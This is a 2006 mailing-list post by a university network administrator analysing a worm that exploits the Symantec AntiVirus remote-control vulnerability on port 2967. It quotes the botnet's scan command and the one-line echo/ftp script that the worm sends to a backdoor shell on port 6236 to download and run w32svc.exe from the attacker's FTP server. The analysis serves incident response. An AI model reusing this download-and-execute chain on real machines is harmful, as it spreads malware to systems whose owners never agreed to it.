[unisog] Worm exploiting Symantec client defect?????
iglesias at uci.edu
Mon Nov 27 23:02:09 GMT 2006
Gary Flynn wrote:
> Anyone know anything more about what SANS
> is reporting on this?
Once a system connects to the bot controller, it gets a message like this (all
on one line):
#text :.asc -S -s |.asc rtvscan 100 5 0 128.x.x.x |.asc rtvscan 100 5 0 128.x.x.x
This appears to start a scan on ports 2967 and 6236. Port 2967 is the port
used by Symantec AV remote control; I haven't seen any traffic there once the
scanning system finds that port open so I can only guess that it attacks it to
try to exploit the vulnerability in Symantec AV that was announced in May.
Port 6236 appears to be some kind of command line backdoor left behind by a
successful exploitation of the Symantec AV bug, as the prompt that the
scanning system gets when it connects is "C:\Program Files\Symantec AntiVirus
>". If the scanning system finds port 6236 open, it sends this to it (again,
all on one line):
echo open <attacker's ip> 2100 > i&echo user 1 1 > > i &echo get
w32svc.exe > > i &echo quit > > i &ftp -As:i &w32svc.exe &exit
The scanning system has port 2100 open running a ftp server, and the system
with port 6236 open is told to go get w32svc.exe and run it. The ftp server
responds with "220 Reptile welcomes you.." when you connect to it. I haven't
been able to pull down a copy of w32svc.exe from one of these systems, so I
don't know if the ftp server is really working or not.
The Symantec advisor for the vulnerability is available at
Mike Iglesias Email: iglesias at uci.edu
University of California, Irvine phone: 949-824-6926
Network & Academic Computing Services FAX: 949-824-2069
More information about the unisog